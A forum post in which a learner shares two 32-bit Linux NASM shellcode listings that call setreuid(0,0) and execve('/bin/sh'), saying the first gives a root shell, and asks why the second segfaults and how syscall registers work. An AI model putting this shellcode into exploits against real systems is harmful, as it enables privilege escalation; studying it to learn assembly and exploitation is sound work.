Hello,
to learn more not only about Nasm but also about fundamental priciples of the whole system and of c and nasm together I've been working with shellcode for a few weeks.
But that's not actual the problem I've got. The main problem is to understand why and when I get segmentation faults after succesfully compiling and linking.
Let me show what I mean
; The following example works fine after I've changed a few lines:
BITS 32
; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80
; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx
xor eax,eax
push eax
mov al,11
xor edx,edx
push ebx
mov ecx,esp
int 0x80
two:
call one
db '/bin/sh'
--------------------------------------------------------------
I get a shell and if prepared it's a root shell
But the next example doesn't work: I get a segmentation fault
----------------------------------------------------------------------
BITS 32
; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80
; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db '/bin/shXAAAABBBB'
----------------------------------------
The last one is esspecially described in one book as shellcode for working under linux. I only would like to know, why it doesn't work. It seems to me, that - I read this in different books - it depends on how the stack and the registers are used. FreeBSD uses mainly the stack for arguments and linux the registers.
I would like to know, how to use the registers right in combination with the stack.
Also examples of how to use the syscalls with registers would be important to me. The syscall-table I've got shows not more than headlines and that is not often clear; even if I read the man pages I often get not a really usefull answer.
For example: in my syscall-list execve is mentioned as one which gets the paramerters only in ebx using a structure called pt_regs, but the other registers aren't mentioned although one must use them (eax,ebx,ecx,edx) in order to execute the programm right. And nothing is said about the stack and how much parameters at all can be used.
Would be happy for every helfull answer, that makes it clearer to me.
Thanks
Michel
